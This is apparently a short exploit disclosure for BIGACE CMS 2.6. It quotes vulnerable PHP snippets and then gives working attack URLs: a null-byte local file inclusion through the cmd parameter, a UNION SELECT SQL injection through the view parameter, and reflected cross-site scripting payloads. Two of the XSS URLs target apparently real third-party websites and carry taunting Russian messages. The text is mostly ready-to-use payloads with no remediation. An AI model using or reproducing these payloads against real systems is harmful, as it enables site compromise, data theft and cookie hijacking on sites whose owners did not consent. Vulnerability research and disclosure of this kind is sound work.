// PROCESSING COMMAND INTERPRETER $COMMAND_FILE = _BIGACE_DIR_ROOT . '/system/command/' . $GLOBALS['_BIGACE']['PARSER']->getCommand() . '.cmd.php'; if ( file_exists($COMMAND_FILE) ) { include_once ($COMMAND_FILE);
http://localhost/test/bigace_2.6/public/index.php?cmd=[evil_file].php%00&id=tpl-frameset_tADMIN_len
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=tpl-frameset_tADMIN_len%3Cscript%3Ealert(document.cookie)%3C/script%3E
if(isset($_GET['view'])) { $values = array( 'ORDER_BY' => '', 'LIMIT' => '', 'WHERE_EXTENSION' => " AND id='".$_GET['view']."'" ); $sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->loadStatement('logging_filter'); $sqlString = $GLOBALS['_BIGACE']['SQL_HELPER']->prepareStatement($sqlString, $values); $entry = $GLOBALS['_BIGACE']['SQL_HELPER']->execute($sqlString); $entry = $entry->next();
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=[id]--+
http://localhost/test/bigace_2.6/public/index.php?cmd=admin&id=logging_tADMIN_len&view=-48'+union+select+text_1,2,3,4,5,6,7,8,9,10+from+cms_item_5+where+id=3--+
public/index.php?cmd=application&id=">alert('xss')
http://www.ivao.ch/ba_cms/public/index.php?cmd=application&id=">alert('за тобой выехали=)') http://newgate-consulting.de/public/index.php?cmd=application&id=">alert('берегись')